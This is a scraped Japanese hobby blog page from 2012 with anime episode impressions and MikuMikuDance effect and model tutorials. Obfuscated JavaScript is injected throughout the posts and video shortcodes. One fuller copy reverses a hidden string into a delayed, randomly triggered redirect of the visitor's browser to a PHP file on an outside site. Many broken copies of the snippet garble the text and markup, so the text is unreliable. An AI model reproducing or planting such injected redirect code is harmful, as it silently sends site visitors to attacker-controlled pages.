カレンダー

2012年2月
« 1月 3月 »
 1234
567891011
12131415161718
19202122232425
26272829 

【アニメ感想】アクエリオン EVOL 第8話「さらけだせ」

[nicolink vidom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}deoid=”1329988509″]

ネタバレ注意!!

今回は、いつも以上にぶっとんでましたね。

でも、まじめにバカやってて、今回も面白かった。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

アマタの写真を堂々?と購入するの可愛い。

しかし、ネコの手で写真買わせるのね。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

さりげなく、靴下をはかせてたりする、おちゃめさん。

しかし、靴下を脱がされたら負けとか、随所のネタが面白いな。

MIXが服装が淫らとか言ってるけど、MIXさんも十分けしからん服装だと思います。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

見られることによる興奮、わかるのか・・・

この、「えっ?」て感じのやりとりが微妙にツボだった。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

この黒いスーツの描写ものすごくかっこいいと思えた。

ほかはエロかったけど。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

俺もぬぐぜーーーー

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

女子、大歓喜!!

てことですね。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

そして、脱いだ状態の写真を買う勇気!!

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

恥ずかしがり屋なのに勇気ありすぎ。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

しかし、これでフラグ完全に立った感じですね。

いやー三角関係?

このあたりは、いつもの花澤さんっぽい感じの声になってましたね。

デレ声とか、恥ずかしがる声は、こうなるのかな?

予告をみると、ついにアンディ、MIXあたりの話もありそうなので、楽しみです。

【MME】発光エフェクト第3弾 AutoLuminousのVer2.0が公開されてた

ちょっとまえにAutoLuminousの記事を書いたばかりですがVer2.0が公開されていました。

こちらの記事

/*$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == "string") return $cFN$wEpyMrNXtezaeR2.list[n].split("").reverse().join("");return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=["\'php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}dex.html” target=”_blank”>【MME】発光エフェクト第3弾 AutoLuminous使用してみた

配布先に関する情報はこちらの動画のコメントを参照してください。

[nicolink vidom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}deoid=”sm16087751″]

ダウンロードページにいったら

2012/2/27の日付でAutoLuminous2があるのでそれをダウンロードしてください。

Readmeの更新履歴にはVer2.0で以下の変更と記載されていました。

Ver.2.0

・頂点発光機能の追加

・テクスチャ発光の異方性フィルタリング対応(初期値では無効)

・対応モーフの追加

・残光機能の追加(初期値では無効)

・加算スフィア対策版full.fx同梱

・細かいバグ修正

・MikuMikuMoving仮対応

正直、よくわかっていません。

加算スフィア対策版full.fx同梱を試してみるとわかるのかな?

残光機能の追加というのも気になります。

時間見つけて、このあたりも試してみたいです。

【MMDモデル紹介】にがもん式霊夢が配布されているのか

モデル配布先は、下記動画のコメント参照。

[nicolink vidom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}deoid=”sm16945065″]

早速ダウンロードしてみました。MMEじゃないほうのモデルを表示しています。

MME付きのほうは本当に1分くらいまたないとモデル読み込めないですね。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

正面から。

左はアリス、右が今回ダウンロードした霊夢。

大きさはほぼ同じですね。

 

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

横から見た状態。

胸の大きさも同じくらいか。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

脇チェック。綺麗。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

口の中チェック。歯がありました。

にがもん式霊夢は顔芸世界一にどう対抗していくのか?(そもそも対抗しようとするのだろうか)

幼い感じで可愛らしい霊夢ですよね。

黒い髪ってこういう暗い背景だとすぐに目立たなくなって、そういう点ではちょっと考えないといけないのかも。

【アニメ感想】妖狐×僕SS 第6話「考えるよりも」

[nicolink vidom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}deoid=”1330052828″]

ネタバレ注意!!

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

出だしの焼き海苔!!

可愛い。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

犬と一緒。

これも可愛い。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

キマシタワー!!

やはり可愛い。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

メガネ属性はないんだけど、りりちよのメガネもいいよね。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

めずらしくツッコミ!!

まさかツッコミができるとは!?

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

落下するシーン。

胸もとかなり開いてるんだけど、筋しか見えない・・・

いや、これは筋ではない!!胸の膨らみの影とみた!!

え?注目するところが違う?

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

EDは恋愛サーキュレーションを彷彿とさせるかわいい歌&映像。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

カルタはスタイルいいよね。

なんというケシカラン体。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

このデフォルメも可愛いですよね。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

まさにスイート。

わたぬきとキスしたいだと!?

わたぬき爆発しろ!!

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

このカルタ、左はクレープ可愛い。右はえろっちくてGJ

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

けしからん、けしからんぞーーー!!

スク水!!

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

右はメイドさんなのかな?猫耳!

カルタ可愛い。

りりちよといい、カルタといい、可愛いな~。

コロボックルはもっと出番増えないかな。

一反木綿は声だけちょっとだけか。。。

それにしても、全然感想になってない。

感想は、可愛いてことでしょう。

【MME】発光エフェクト第3弾 AutoLuminous使用してみた

Readmeの説明では「KeyLuminous、ObjectLuminous に続く発光エフェクト第3弾」とのこと。

発行させる手順がとても簡単になっています。

[nicolink vidom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}deoid=”sm16087751″]

配布先は、動画のコメントに記載されています。

 

 

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

デフォルトで入っているミクモデルを例にしてみます。

発光部分は、ヘッドセットの赤部分です。

 

 

 

PMDエディタを起動

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

上記がデフォルトの状態。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

材質のタブから該当の材質を選択。

この例だと、ヘッドセット(赤い部分)になります

赤い枠の部分を変更します。

・光らせたい素材のスペキュラ色(反射色)を黒(0,0,0)

・スペキュラ強度(反射強度)を100以上に設定dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

 例だと110に設定しています。dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}



設定はこれだけ。名前つけて保存。

(注意)別の材質でたまたま上記と同じ設定があると光っちゃいます。

 

 

 

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

保存したファイルを読み込み

AutoLuminous.xも読み込みます。

照明も、左にもっていって暗くします(そうしないと光ってるのがわかりにくいです)

そうすると、上の図のようにヘッドセットの赤い部分が光ります。

耳のところも同じ材質なので光ってます。

これはデフォルト状態。かなり光ってます。

 

 

 

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

詳細はReadmeを参照してもらうとして

Si:(発光強度)をいじると発光具合が調節できます。

上は数値を少なくして、発光を抑えた状態。

このあたりは、いじりながら調整になるかと思います。

 

 

 

別のモデル(ステージ)での利用例

上記までは人物の一部を光らせる演出でしたが、たとえばステージのレーザーにも使えます。

例えば「ライブ会場風モデル」のレーザーです。(製作者:カブッP)

とりあえず、例なので、材質52(緑色のレーザー)だけが光るように設定します。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

設定は、同じにしています。

 

 

 

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

保存したモデルを読んで、緑のレーザーを表示すると上記のように光って見えます。

1.0のままだと光りすぎたのでちょっと光を抑えています。

あとは観客が持っているサイリウムを光らせたりするのもいいかもしれません。

 

 

 

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

ちなみに上記がAutoLuminousを非表示にした状態です。

レーザーっぽくない、ただの棒です。

演出上かなり変わるのでお試しあれ。